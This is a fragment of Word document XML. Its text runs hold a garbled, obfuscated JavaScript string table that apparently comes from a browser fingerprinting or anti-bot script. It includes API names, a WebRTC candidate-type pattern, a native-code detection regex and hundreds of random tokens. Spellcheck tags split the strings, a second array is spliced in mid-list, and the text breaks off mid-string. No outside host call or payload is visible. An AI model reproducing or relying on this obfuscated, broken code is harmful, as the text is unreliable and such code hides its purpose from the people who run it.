      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVg</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>L7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", "g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isFinite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-", "VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>axg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A","charCodeAt", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", &gt;&gt;var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "QnegWe5abZtfVg", "name", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "bDKbeclZUqkceQ","d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1N